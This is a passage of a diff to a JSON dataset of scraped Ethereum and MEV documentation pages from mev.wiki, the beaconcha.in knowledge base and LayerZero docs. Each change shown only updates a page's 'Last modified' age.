for a predetermined period of time (during the sequencing phase), and then made public. 2 approaches using privacy to minimize MEV 1. Time-locks as part of the protocol layer 2. Time-locks on Ethereum with smart contracts - supported today Links: Website: https://starkware.co/ Medium: https://medium.com/starkware/presenting-veedo-e4bbff77c7ae Presentation: https://docs.google.com/presentation/d/1C_Rb_rtUXT2Nkettu_GPSlD9yCge8ioBNLRj5OBNbyY/edit#slide=id.gb576f94980_0_836 Previous CowSwap Next LibSubmarine Last modified 2yr ago", "labels": [ "Documentation" ] @@ -810,7 +810,7 @@ { "title": "Vega protocol", "html_url": "https://www.mev.wiki/solutions/mev-minimization/vega-protocol", - "body": "Vega protocol Vega Protocol Traditionally, fairness in a blockchain has been defined in absolute terms, i.e. once a transaction is seen by a sufficient number of validators, it will be executed in some block, soon. Vega's proposal is to add a module to blockchains that supports the concept of relative fairness so that competing transactions may be sequenced under a known and understood protocol, and not subject to a validators discretion. \" If there is a time t such that all honest validators saw a before t and b after t, then a must be scheduled before b. This is a property that can be assured of at any time with a minimal impact on performance. To get the best combination, their current approach is a hybrid of the two. In normal operation, the protocol will assure block fairness. If the network detects that this causes a bottleneck, it temporarily switches to the timed approach (thus sacrificing a little fairness for performance), before switching back once the bottleneck is resolved. However, Vega will ultimately make the level of fairness customisable by market. Links: Website: https://vega.xyz/ Blog: https://blog.vega.xyz/new-paper-fairness-and-front-running-an-invitation-for-feedback-cbb39a1a3eb Wendy, the Good Little Fairness Widget: https://vega.xyz/papers/fairness.pdf Video: https://www.youtube.com/watch?v=KjfLj5fhkGQ&t=18s&ab_channel=VegaProtocol Previous Arbitrum (Offchain Labs) Next CowSwap Last modified 1yr ago", + "body": "Vega protocol Vega Protocol Traditionally, fairness in a blockchain has been defined in absolute terms, i.e. once a transaction is seen by a sufficient number of validators, it will be executed in some block, soon. Vega's proposal is to add a module to blockchains that supports the concept of relative fairness so that competing transactions may be sequenced under a known and understood protocol, and not subject to a validators discretion. \" If there is a time t such that all honest validators saw a before t and b after t, then a must be scheduled before b. This is a property that can be assured of at any time with a minimal impact on performance. To get the best combination, their current approach is a hybrid of the two. In normal operation, the protocol will assure block fairness. If the network detects that this causes a bottleneck, it temporarily switches to the timed approach (thus sacrificing a little fairness for performance), before switching back once the bottleneck is resolved. However, Vega will ultimately make the level of fairness customisable by market. Links: Website: https://vega.xyz/ Blog: https://blog.vega.xyz/new-paper-fairness-and-front-running-an-invitation-for-feedback-cbb39a1a3eb Wendy, the Good Little Fairness Widget: https://vega.xyz/papers/fairness.pdf Video: https://www.youtube.com/watch?v=KjfLj5fhkGQ&t=18s&ab_channel=VegaProtocol Previous Arbitrum (Offchain Labs) Next CowSwap Last modified 2yr ago", "labels": [ "Documentation" ] @@ -818,7 +818,7 @@ { "title": "B.Protocol", "html_url": "https://www.mev.wiki/solutions/others/b.protocol", - "body": "B.Protocol B.Protocol B.Protocol aims to shift MEV to users. Users interact with existing lending platforms via B.Protocol smart contract. Liquidity providers (LP) provide a cushion to user debt, which gives B.Protocol precedence over other liquidators. LPs share their profits with the users, where user reward is proportional to his user rating. Links: Website: https://www.bprotocol.org/ Presentation: https://docs.google.com/presentation/d/13UNysGCX9ZJG20lKaxr_qbhgKwcuHACdwlhGNKtzGt4/edit Previous Other solutions Next Miscellaneous Last modified 1yr ago", + "body": "B.Protocol B.Protocol B.Protocol aims to shift MEV to users. Users interact with existing lending platforms via B.Protocol smart contract. Liquidity providers (LP) provide a cushion to user debt, which gives B.Protocol precedence over other liquidators. LPs share their profits with the users, where user reward is proportional to his user rating. Links: Website: https://www.bprotocol.org/ Presentation: https://docs.google.com/presentation/d/13UNysGCX9ZJG20lKaxr_qbhgKwcuHACdwlhGNKtzGt4/edit Previous Other solutions Next Miscellaneous Last modified 2yr ago", "labels": [ "Documentation" ] @@ -834,7 +834,7 @@ { "title": "Attestation", "html_url": "https://kb.beaconcha.in/attestation", - "body": "Attestation An overview of attestations Attestation Every Epoch (~6.4 minutes) a validator proposes an attestation (vote) to the network. This vote consists of the following segments: Committee Validator Index Finality vote Signature Chain head vote (vote on what the validator believes is the head of the chain) A minimum of 16,384 validators is required to start Ethereum 2.0. If we multiply that with the information included in each Attestation per Epoch, it adds up quickly. Therefore, Ethereum 2.0 aggregates all of that information and minimises the data growth. Aggregated Attestation An aggregation is a collection, or the gathering of things together. Your baseball card collection might represent the aggregation of lots of different types of cards. So what does that mean for Attestations? Each block one or more committees are chosen to attest. A committee has a minimum of 128 validators, of which 16 are randomly selected to become an aggregator. As shown below, the validators broadcast their unaggregated attestation to the aggregators (red arrow). The aggregators then merge the attestations and forward a single aggregated attestation to the block proposer . Attestation Inclusion Lifecycle 1. Generation 2. Propagation 3. Aggregation 4. Propagation 5. Inclusion Rewards The attestation reward is dependent on two variables, the base reward and the inclusion delay. The best case for the inclusion delay is to be 1. Source: ConsenSys Codefi Analysis Base reward ( Validator effective balance * 2**6 ) / SQRT( Effective balance of all active validators ) Inclusion delay At the time when the validators voted on the head of the chain (Block 0), Block 1 was not proposed yet. Therefore attestations naturally get included one block later; so all attestations who voted on Block 0 being the chain head got included in Block 1 and, the inclusion delay is 1. The effects of the inclusion delay on the attestation reward As shown below, an Inclusion delay of 2 causes the the reward to drop by 50%. Source: Consensys A ttestation scenarios Missing Voting Validator These validators have a maximum of 1 epoch to submit their attestation. If the attestation was missed in epoch 0, they can submit it with an inclusion delay in epoch 1. Missing Aggregator There are 16 Aggregators per epoch in total, additionally, random validators from the beacon-chain subscribe to two subnets for 256 Epochs and serve as a backup in case aggregators are missing. Missing block proposer Note that in some cases a lucky aggregator may also become the block proposer. If the attestation was not included because the block proposer has gone missing, the next block proposer would pick the aggregated attestation up and include it into the next block. However, the inclusion delay will increase by one. Credits Attestation effectiveness - AttestantIO Attestation Inclusion - Adrian Sutton (Consensys) Previous Deposit Process Next Rewards and Penalties Last modified 2yr ago", + "body": "Attestation An overview of attestations Attestation Every Epoch (~6.4 minutes) a validator proposes an attestation (vote) to the network. This vote consists of the following segments: Committee Validator Index Finality vote Signature Chain head vote (vote on what the validator believes is the head of the chain) A minimum of 16,384 validators is required to start Ethereum 2.0. If we multiply that with the information included in each Attestation per Epoch, it adds up quickly. Therefore, Ethereum 2.0 aggregates all of that information and minimises the data growth. Aggregated Attestation An aggregation is a collection, or the gathering of things together. Your baseball card collection might represent the aggregation of lots of different types of cards. So what does that mean for Attestations? Each block one or more committees are chosen to attest. A committee has a minimum of 128 validators, of which 16 are randomly selected to become an aggregator. As shown below, the validators broadcast their unaggregated attestation to the aggregators (red arrow). The aggregators then merge the attestations and forward a single aggregated attestation to the block proposer . Attestation Inclusion Lifecycle 1. Generation 2. Propagation 3. Aggregation 4. Propagation 5. Inclusion Rewards The attestation reward is dependent on two variables, the base reward and the inclusion delay. The best case for the inclusion delay is to be 1. Source: ConsenSys Codefi Analysis Base reward ( Validator effective balance * 2**6 ) / SQRT( Effective balance of all active validators ) Inclusion delay At the time when the validators voted on the head of the chain (Block 0), Block 1 was not proposed yet. Therefore attestations naturally get included one block later; so all attestations who voted on Block 0 being the chain head got included in Block 1 and, the inclusion delay is 1. The effects of the inclusion delay on the attestation reward As shown below, an Inclusion delay of 2 causes the the reward to drop by 50%. Source: Consensys A ttestation scenarios Missing Voting Validator These validators have a maximum of 1 epoch to submit their attestation. If the attestation was missed in epoch 0, they can submit it with an inclusion delay in epoch 1. Missing Aggregator There are 16 Aggregators per epoch in total, additionally, random validators from the beacon-chain subscribe to two subnets for 256 Epochs and serve as a backup in case aggregators are missing. Missing block proposer Note that in some cases a lucky aggregator may also become the block proposer. If the attestation was not included because the block proposer has gone missing, the next block proposer would pick the aggregated attestation up and include it into the next block. However, the inclusion delay will increase by one. Credits Attestation effectiveness - AttestantIO Attestation Inclusion - Adrian Sutton (Consensys) Previous Deposit Process Next Rewards and Penalties Last modified 3yr ago", "labels": [ "Documentation" ] @@ -850,7 +850,7 @@ { "title": "Deposit Process", "html_url": "https://kb.beaconcha.in/ethereum-2.0-depositing", - "body": "Deposit Process This post will explain the depositing process and each of the phases. Before we start, to understand the basic idea of how Ethereum 2.0 keys work, the Ethereum 2.0 Keys blog is highly recommended. The deposit contract Let's go through each of the states above and explain how their durations are approximately determined. 1. Mempool - Status: Unknown Every signed transaction visits the Mempool first, which can be referred to as the waiting room for transactions. During this period, the transaction status is pending . Depending on the chosen gas fee for the transaction, miners pick the ones that return them the most value first. If the network is highly congested (=many pending transactions), there's a high chance that new transactions will outbid(gas fees) older transactions, leading to unknown waiting times. 2. Deposit contract - Status: Deposited Once the transaction reaches the deposit contract, the deposit contract checks the transaction for its Input data and value. If the threshold of 1 ETH is not met or the transaction has no/invalid input data, the transaction will get rejected and returned to the sender. The user-created input data is a reflection of the upcoming validator and withdrawal keys on the Ethereum 2.0 network as seen in the picture below. The full Ethereum 2.0 keys blog is here . Why exactly does this take at least 13.6 hours? The Ethereum 2.0 chain only considers transactions which have been in the deposit contract for at least 2048 Ethereum 1.0 blocks to ensure they never end up in a reorged block. (= ETH1_FOLLOW_DISTANCE ) In addition to the 2048 Ethereum 1.0 blocks, 64 Ethereum 2.0 Epochs ****must be**** awaited before the beacon-chain recognises the deposit. During these 64 Epochs, validators vote on newly received deposits. However, missed block proposals or bad Ethereum 1.0 nodes, which provide the deposit logs to the Ethereum 2.0 network can cause longer waiting times. Therefore, run your own node ! 2048 blocks = 2048 x 12 seconds = 24,576 seconds = 409.6 minutes = ~6.82 hours 64 Epochs = 64 x 6.4 minutes = 409.6 minutes = ~6.82 hours Once the deposit is in the deposit contract, the state of the validator will switch to Deposited on the beaconcha.in explorer. Rejected Deposit Rejected Transaction 3. Validator Queue - Status: Pending The deposit is accessible now for the beacon-chain. Depending on the amount of total deposits, the validators have to wait in a queue. Eight validators per Epoch ( 1800 validators per day) can get activated. 4. Staking - Status: Active The validator is now actively staking. It is proposing blocks and signing attestations - ready to earn ETH! Other validator status Deposit Invalid The transaction had an invalid BLS signature. Active Offline An active validator has not been attesting for at least two epochs. Exiting Online The validator is online and currently exiting the network because either its balance dropped below 16ETH (forced exit) or the exit was requested (voluntary exit) by the validator. Exiting Offline The validator is offline and currently exiting the network because either its balance dropped below 16ETH or the exit was requested by the validator. Slashing Online The validator is online but was malicious and therefore forced to exit the network. Slashing Offline The validator is offline and was malicious and which lead to a forced to exit out of the network. The validator is currently in the exiting queue with a minimum of 25 minutes. Slashed The validator has been kicked out of the network. The funds will be withdrawable after 36 days. Exited The validator has exited the network. The funds will be withdrawable after 1 day. Previous The Genesis Event Next Attestation Last modified 4mo ago", + "body": "Deposit Process This post will explain the depositing process and each of the phases. Before we start, to understand the basic idea of how Ethereum 2.0 keys work, the Ethereum 2.0 Keys blog is highly recommended. The deposit contract Let's go through each of the states above and explain how their durations are approximately determined. 1. Mempool - Status: Unknown Every signed transaction visits the Mempool first, which can be referred to as the waiting room for transactions. During this period, the transaction status is pending . Depending on the chosen gas fee for the transaction, miners pick the ones that return them the most value first. If the network is highly congested (=many pending transactions), there's a high chance that new transactions will outbid(gas fees) older transactions, leading to unknown waiting times. 2. Deposit contract - Status: Deposited Once the transaction reaches the deposit contract, the deposit contract checks the transaction for its Input data and value. If the threshold of 1 ETH is not met or the transaction has no/invalid input data, the transaction will get rejected and returned to the sender. The user-created input data is a reflection of the upcoming validator and withdrawal keys on the Ethereum 2.0 network as seen in the picture below. The full Ethereum 2.0 keys blog is here . Why exactly does this take at least 13.6 hours? The Ethereum 2.0 chain only considers transactions which have been in the deposit contract for at least 2048 Ethereum 1.0 blocks to ensure they never end up in a reorged block. (= ETH1_FOLLOW_DISTANCE ) In addition to the 2048 Ethereum 1.0 blocks, 64 Ethereum 2.0 Epochs ****must be**** awaited before the beacon-chain recognises the deposit. During these 64 Epochs, validators vote on newly received deposits. However, missed block proposals or bad Ethereum 1.0 nodes, which provide the deposit logs to the Ethereum 2.0 network can cause longer waiting times. Therefore, run your own node ! 2048 blocks = 2048 x 12 seconds = 24,576 seconds = 409.6 minutes = ~6.82 hours 64 Epochs = 64 x 6.4 minutes = 409.6 minutes = ~6.82 hours Once the deposit is in the deposit contract, the state of the validator will switch to Deposited on the beaconcha.in explorer. Rejected Deposit Rejected Transaction 3. Validator Queue - Status: Pending The deposit is accessible now for the beacon-chain. Depending on the amount of total deposits, the validators have to wait in a queue. Eight validators per Epoch ( 1800 validators per day) can get activated. 4. Staking - Status: Active The validator is now actively staking. It is proposing blocks and signing attestations - ready to earn ETH! Other validator status Deposit Invalid The transaction had an invalid BLS signature. Active Offline An active validator has not been attesting for at least two epochs. Exiting Online The validator is online and currently exiting the network because either its balance dropped below 16ETH (forced exit) or the exit was requested (voluntary exit) by the validator. Exiting Offline The validator is offline and currently exiting the network because either its balance dropped below 16ETH or the exit was requested by the validator. Slashing Online The validator is online but was malicious and therefore forced to exit the network. Slashing Offline The validator is offline and was malicious and which lead to a forced to exit out of the network. The validator is currently in the exiting queue with a minimum of 25 minutes. Slashed The validator has been kicked out of the network. The funds will be withdrawable after 36 days. Exited The validator has exited the network. The funds will be withdrawable after 1 day. Previous The Genesis Event Next Attestation Last modified 5mo ago", "labels": [ "Documentation" ] @@ -938,7 +938,7 @@ { "title": "beaconcha.in notifications", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/beaconcha.in-notifications", - "body": "beaconcha.in notifications This article provides a tutorial on setting up and debugging notifications using beaconcha.in's web and mobile platforms. It's worth noting that the current notification center will undergo an upgrade in late 2023 to upgrade its user-friendliness. Enabling notifications via web 1. Head over to https://beaconcha.in/user/notifications and log in with your e-mail address. 2. Click on \"Notifications Channels\" and make sure the desired channels are active 3. Scroll down to the Validators table and add your validators. Once added you can select all and bulk edit the notifications by clicking Manage selected . 4. Enable the desired notification(s) and press Save . 5. Verify that the subscriptions are enabled 6. If a notification was triggered it will show up in the Most recent column 7. Done! You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Mobile app 1. Download the app for iOS and Android here https://beaconcha.in/mobile 2. Create an account and log in with your e-mail address Note : If you added validators to your Notification center through https://beaconcha.in/user/notifications they will not appear in your mobile app automatically. If push notifications were enabled in the web notification center, the mobile app push the notifications through even if the validators are not visible in your app. This UX issue will be part of the improvements later this year. 3. Add validators to your mobile app dashboard 4. Head over to the settings and enable the desired notifications 5. Click the \"Sync\" button in the Validator section 6. Done! Verify that the notifications were added successfully by logging in at https://beaconcha.in/user/notifications and scrolling to the Validator table at the bottom of the page You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Webhooks 1. Follow the steps as described above in \" Enabling notifications via web\" . 2. Double-check that webhooks are enabled 3. Add a webhook via https://beaconcha.in/user/webhooks 4. Enable the same notification types as on the notification center and enable \"discord\" if the notifications should be sent to a discord channel 5. Done Beaconcha.in Explorer - Previous Mobile App <> Node Monitoring Next - Beaconcha.in Explorer Block view Last modified 4mo ago", + "body": "beaconcha.in notifications This article provides a tutorial on setting up and debugging notifications using beaconcha.in's web and mobile platforms. It's worth noting that the current notification center will undergo an upgrade in late 2023 to upgrade its user-friendliness. Enabling notifications via web 1. Head over to https://beaconcha.in/user/notifications and log in with your e-mail address. 2. Click on \"Notifications Channels\" and make sure the desired channels are active 3. Scroll down to the Validators table and add your validators. Once added you can select all and bulk edit the notifications by clicking Manage selected . 4. Enable the desired notification(s) and press Save . 5. Verify that the subscriptions are enabled 6. If a notification was triggered it will show up in the Most recent column 7. Done! You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Mobile app 1. Download the app for iOS and Android here https://beaconcha.in/mobile 2. Create an account and log in with your e-mail address Note : If you added validators to your Notification center through https://beaconcha.in/user/notifications they will not appear in your mobile app automatically. If push notifications were enabled in the web notification center, the mobile app push the notifications through even if the validators are not visible in your app. This UX issue will be part of the improvements later this year. 3. Add validators to your mobile app dashboard 4. Head over to the settings and enable the desired notifications 5. Click the \"Sync\" button in the Validator section 6. Done! Verify that the notifications were added successfully by logging in at https://beaconcha.in/user/notifications and scrolling to the Validator table at the bottom of the page You may have noticed that the Notification Center allows you to configure Push notifications for the mobile app. This is crucial since some users may not receive any push notifications if it is disabled. Webhooks 1. Follow the steps as described above in \" Enabling notifications via web\" . 2. Double-check that webhooks are enabled 3. Add a webhook via https://beaconcha.in/user/webhooks 4. Enable the same notification types as on the notification center and enable \"discord\" if the notifications should be sent to a discord channel 5. Done Beaconcha.in Explorer - Previous Mobile App <> Node Monitoring Next - Beaconcha.in Explorer Block view Last modified 5mo ago", "labels": [ "Documentation" ] @@ -954,7 +954,7 @@ { "title": "Block view", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/ethereum-2.0-blocks", - "body": "Block view Blocks 'n' roots This post is going to lay out data, Ethereum 2.0 explorers such as beaconcha.in visualise Overview Epoch , Slot , Status , Proposer are covered in the glossary Block root The hash-tree-root of the BeaconBlock . State root The hash-tree-root of the BeaconState . Signature The BLS signature obtained by using the BeaconState, BeaconBlock and private key. def get_block_signature(state: BeaconState, block: BeaconBlock, privkey: int) -> BLSSignature Randao Reveal TODO Grafitti A block proposer can include 32 byte long message to its block proposal. Eth 1 Data Received Eth1 Block headers and Deposit data Block Hash: The Hash of the received Eth1 Block. Deposit Count: Amount of validator deposits to the deposit contract in this block. Deposit Root: The root of the merkle tree of deposits. Attestations Amount of attestations included in this block by the block proposer. Deposits Amount of validator deposits which have been included in this block by the block proposer Voluntary Exits Amount of voluntary Exits which have been included in this block by the block proposer. Slashings Amount of slashings which have been included in this block by the block proposer. Votes Represents the total amount of votes in a specific block. In the example below there were 128 attestations. These attestations received a total of 2802 votes. The aggregation bit is an additional way of representing the votes. Attestations Slot Is the slot number to which the validator is attesting. The slot number points to the same block as the beacon-block-root. Committee Index Every epoch the total number of validators is split up in committees and one or more individual committees are responsible to attest to each slot. The committee Index is the identifier for this specific committee during a slot. Aggregation Bits Represents the aggregated attestation of all participating validators in this attestation. Each \"1\" bit is a successful attestation submitted by the validator. \"0\" bits visualise missed attestations. Validators Validators who have submitted their attestation and have been included by the block proposer. Beacon Block Root The beacon block root points to the block to which validators are attesting. The difference between the block number in which the attestation has been included, and the one the beacon block root is pointing to, causes the attestation inclusion delay. Source & Target These are two additional votes a validator has to submit. The source points to the latest justified epoch, and the target to the latest epoch boundary. Signature Beaconcha.in Explorer - Previous beaconcha.in notifications Next - Beaconcha.in Explorer Beaconcha.in Charts Last modified 2yr ago", + "body": "Block view Blocks 'n' roots This post is going to lay out data, Ethereum 2.0 explorers such as beaconcha.in visualise Overview Epoch , Slot , Status , Proposer are covered in the glossary Block root The hash-tree-root of the BeaconBlock . State root The hash-tree-root of the BeaconState . Signature The BLS signature obtained by using the BeaconState, BeaconBlock and private key. def get_block_signature(state: BeaconState, block: BeaconBlock, privkey: int) -> BLSSignature Randao Reveal TODO Grafitti A block proposer can include 32 byte long message to its block proposal. Eth 1 Data Received Eth1 Block headers and Deposit data Block Hash: The Hash of the received Eth1 Block. Deposit Count: Amount of validator deposits to the deposit contract in this block. Deposit Root: The root of the merkle tree of deposits. Attestations Amount of attestations included in this block by the block proposer. Deposits Amount of validator deposits which have been included in this block by the block proposer Voluntary Exits Amount of voluntary Exits which have been included in this block by the block proposer. Slashings Amount of slashings which have been included in this block by the block proposer. Votes Represents the total amount of votes in a specific block. In the example below there were 128 attestations. These attestations received a total of 2802 votes. The aggregation bit is an additional way of representing the votes. Attestations Slot Is the slot number to which the validator is attesting. The slot number points to the same block as the beacon-block-root. Committee Index Every epoch the total number of validators is split up in committees and one or more individual committees are responsible to attest to each slot. The committee Index is the identifier for this specific committee during a slot. Aggregation Bits Represents the aggregated attestation of all participating validators in this attestation. Each \"1\" bit is a successful attestation submitted by the validator. \"0\" bits visualise missed attestations. Validators Validators who have submitted their attestation and have been included by the block proposer. Beacon Block Root The beacon block root points to the block to which validators are attesting. The difference between the block number in which the attestation has been included, and the one the beacon block root is pointing to, causes the attestation inclusion delay. Source & Target These are two additional votes a validator has to submit. The source points to the latest justified epoch, and the target to the latest epoch boundary. Signature Beaconcha.in Explorer - Previous beaconcha.in notifications Next - Beaconcha.in Explorer Beaconcha.in Charts Last modified 3yr ago", "labels": [ "Documentation" ] @@ -962,7 +962,7 @@ { "title": "Mobile App <> Node Monitoring", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/mobile-app-less-than-greater-than-beacon-node", - "body": "Mobile App <> Node Monitoring A step by step tutorial on how to monitor your staking device & beaconnode on the beaconcha.in mobile app. General This is a free monitoring tool provided by beaconcha.in to enhance the solo staking experience. The user specifies the monitoring endpoint on its beacon & validator node. By using this endpoint, beaconcha.in will be allowed and is required to store the given data to display it in the beaconcha.in the mobile application. To protect user privacy, the IP address will never be stored. Requirements beaconcha.in Account beaconcha.in Mobile App Lighthouse v.1.4.0 or higher Prysm v1.3.10 or higher Nimbus v1.4.1 or higher Teku v22.3.0 or higher Lodestar v1.6.0 or higher Staking on Linux (No windows support by clients yet!) Please adjust the network on the beaconcha.in browser and mobile app accordingly. Both, the beaconcha.in explorer and the mobile app are open source! Lighthouse A step by step guide on the Prater Testnet. Please adjust the network for your own needs. 1. Open the Mobile App Tab and enter a name for your staking setup. Use the same worker name even if your beaconnode runs on a seperate machine than your validator node. __ __Copy the generated flag and paste it add it to your beacon & validator node __ If your beacon-node or Ethereum 1.0 node is not in sync yet, you will see some warning logs! 2. Open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Prysm 1. Head over to the beaconcha.in settings and open the prysm section: 2. Open a new Terminal and copy paste the commands 3. Make sure your Prysm client (beacon & validator) is already up and running. The exporter will now send the data to your mobile app! 4. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Nimbus 1. Head over to the beaconcha.in settings and open the nimbus section: 2. Add --metrics --metrics-port=8008 to your nimbus client! Otherwise the exporter will not be able to get any data from your client. 3. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Teku Add the following endpoint to your teku node --metrics-publish-endpoint https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY You can find your API Key here: https://beaconcha.in/user/settings#app Lodestar Add the following CLI flag to your Lodestar validator and beaconnode --monitoring.endpoint 'https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY' You can find your API Key in the account settings . Check out the Lodestar documentation about client monitoring for further details. Monitoring with Rocket Pool Works with Lighthouse, Lodestar, Teku and Nimbus only. **** Lighthouse, Lodestar and Teku Add Your beaconcha.in API key in Monitoring/Metrics (service config) **** Nimbus Nimbus does not expose every data, thus, some data such as validators are not visible in the app. Guide: https://gist.github.com/jshufro/89e32d417801bf3dfb02c32a983b63cf Previous Rewards and Penalties Next - Beaconcha.in Explorer beaconcha.in notifications Last modified 4mo ago", + "body": "Mobile App <> Node Monitoring A step by step tutorial on how to monitor your staking device & beaconnode on the beaconcha.in mobile app. General This is a free monitoring tool provided by beaconcha.in to enhance the solo staking experience. The user specifies the monitoring endpoint on its beacon & validator node. By using this endpoint, beaconcha.in will be allowed and is required to store the given data to display it in the beaconcha.in the mobile application. To protect user privacy, the IP address will never be stored. Requirements beaconcha.in Account beaconcha.in Mobile App Lighthouse v.1.4.0 or higher Prysm v1.3.10 or higher Nimbus v1.4.1 or higher Teku v22.3.0 or higher Lodestar v1.6.0 or higher Staking on Linux (No windows support by clients yet!) Please adjust the network on the beaconcha.in browser and mobile app accordingly. Both, the beaconcha.in explorer and the mobile app are open source! Lighthouse A step by step guide on the Prater Testnet. Please adjust the network for your own needs. 1. Open the Mobile App Tab and enter a name for your staking setup. Use the same worker name even if your beaconnode runs on a seperate machine than your validator node. __ __Copy the generated flag and paste it add it to your beacon & validator node __ If your beacon-node or Ethereum 1.0 node is not in sync yet, you will see some warning logs! 2. Open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Prysm 1. Head over to the beaconcha.in settings and open the prysm section: 2. Open a new Terminal and copy paste the commands 3. Make sure your Prysm client (beacon & validator) is already up and running. The exporter will now send the data to your mobile app! 4. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Nimbus 1. Head over to the beaconcha.in settings and open the nimbus section: 2. Add --metrics --metrics-port=8008 to your nimbus client! Otherwise the exporter will not be able to get any data from your client. 3. Wait a few minutes and open the beaconcha.in mobile app and login with your account under Preferences. Your staking device will appear under Machines ! Teku Add the following endpoint to your teku node --metrics-publish-endpoint https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY You can find your API Key here: https://beaconcha.in/user/settings#app Lodestar Add the following CLI flag to your Lodestar validator and beaconnode --monitoring.endpoint 'https://beaconcha.in/api/v1/client/metrics?apikey=YOUR_API_KEY' You can find your API Key in the account settings . Check out the Lodestar documentation about client monitoring for further details. Monitoring with Rocket Pool Works with Lighthouse, Lodestar, Teku and Nimbus only. **** Lighthouse, Lodestar and Teku Add Your beaconcha.in API key in Monitoring/Metrics (service config) **** Nimbus Nimbus does not expose every data, thus, some data such as validators are not visible in the app. Guide: https://gist.github.com/jshufro/89e32d417801bf3dfb02c32a983b63cf Previous Rewards and Penalties Next - Beaconcha.in Explorer beaconcha.in notifications Last modified 5mo ago", "labels": [ "Documentation" ] @@ -970,7 +970,7 @@ { "title": "Optimal Inclusion Distance", "html_url": "https://kb.beaconcha.in/beaconcha.in-explorer/optimal-inclusion-distance", - "body": "Optimal Inclusion Distance The attestation for slot 156508 was included in slot 156510 but why is the inclusion distance 0? If were to use the formula from above and set the inclusion delay to 0, the rewards would be 0 for a proposed attestation. Missed blocks are not added to the inclusion distance, but since the attestant is not responsible for the block proposal, and to only warn the user about its faults (e.g. slow internet connection, power failure etc.), the beaconcha.in explorer displays the distance as 0. Beaconcha.in Explorer - Previous Beaconcha.in Charts Next - Guides Step by Step: How to join the Ethereum 2.0 Testnet Last modified 2yr ago", + "body": "Optimal Inclusion Distance The attestation for slot 156508 was included in slot 156510 but why is the inclusion distance 0? If were to use the formula from above and set the inclusion delay to 0, the rewards would be 0 for a proposed attestation. Missed blocks are not added to the inclusion distance, but since the attestant is not responsible for the block proposal, and to only warn the user about its faults (e.g. slow internet connection, power failure etc.), the beaconcha.in explorer displays the distance as 0. Beaconcha.in Explorer - Previous Beaconcha.in Charts Next - Guides Step by Step: How to join the Ethereum 2.0 Testnet Last modified 3yr ago", "labels": [ "Documentation" ] @@ -1114,7 +1114,7 @@ { "title": "What is LayerZero", "html_url": "https://layerzero.gitbook.io/docs/", - "body": "What is LayerZero Omnichain communication, interoperability, decentralized infrastructure LayerZero's default oracle will be updated to Google Cloud Oracle as of 9/19/23 , details of which you can find here . LayerZero is an omnichain interoperability protocol designed for lightweight message passing across chains. LayerZero provides authentic and guaranteed message delivery with configurable trustlessness. Where can I find more information? For the message protocol design, check out the white paper found on the website . If you are looking for a detailed system architecture explanation, check out the architectures section on the Endpoint and the Ultra-Light Node. Code Examples Learn how to integrate LayerZero into your contracts and take a look at our deployed contracts for Mainnet and Testnet usage. If you want to see some examples to play around head over to our github . See how to send a LayerZero message Next - Bug Bounty Bug Bounty Program Last modified 11d ago", + "body": "What is LayerZero Omnichain communication, interoperability, decentralized infrastructure LayerZero's default oracle will be updated to Google Cloud Oracle as of 9/19/23 , details of which you can find here . LayerZero is an omnichain interoperability protocol designed for lightweight message passing across chains. LayerZero provides authentic and guaranteed message delivery with configurable trustlessness. Where can I find more information? For the message protocol design, check out the white paper found on the website . If you are looking for a detailed system architecture explanation, check out the architectures section on the Endpoint and the Ultra-Light Node. Code Examples Learn how to integrate LayerZero into your contracts and take a look at our deployed contracts for Mainnet and Testnet usage. If you want to see some examples to play around head over to our github . See how to send a LayerZero message Next - Bug Bounty Bug Bounty Program Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1122,7 +1122,7 @@ { "title": "Code Examples", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/code-examples", - "body": "Code Examples Take a look at the following MOVE Examples to get started: LayerZero-Aptos-Contract/bridge.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub TokenBridge LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub OmniCounter Aptos Guide - Previous LZApp Modules Next OmniCounter.move Last modified 10mo ago", + "body": "Code Examples Take a look at the following MOVE Examples to get started: LayerZero-Aptos-Contract/bridge.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub TokenBridge LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub OmniCounter Aptos Guide - Previous LZApp Modules Next OmniCounter.move Last modified 18d ago", "labels": [ "Documentation" ] @@ -1130,7 +1130,7 @@ { "title": "LZApp Modules", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/lzapp-modules", - "body": "LZApp Modules We provide some common modules to help build your UAs to let you put more focus on your business logic. These modules provide many useful functions that are commonly used in most UAs. You can use them directly as they are already deployed by LayerZero, or you can copy them to your own modules and modify them to fit your needs. LZApp The LZApp module provides a simple way for you to manage your UA's configurations and handle error messages. 1. Provides entry functions to config instead of calling from app with UaCapability 2. Allows the app to drop/store the next payload 3. Enables to send a layerzero message with Aptos coin and/or ZRO coin It is very simple to use it, initializing by calling the following in your UA: fun init(account: &signer, cap: UaCapability) LayerZero-Aptos-Contract/lzapp.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Module LayerZero-Aptos-Contract/remote.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub LZApp Remote Module Previous Receive Messages Next - Aptos Guide Code Examples Last modified 10mo ago", + "body": "LZApp Modules We provide some common modules to help build your UAs to let you put more focus on your business logic. These modules provide many useful functions that are 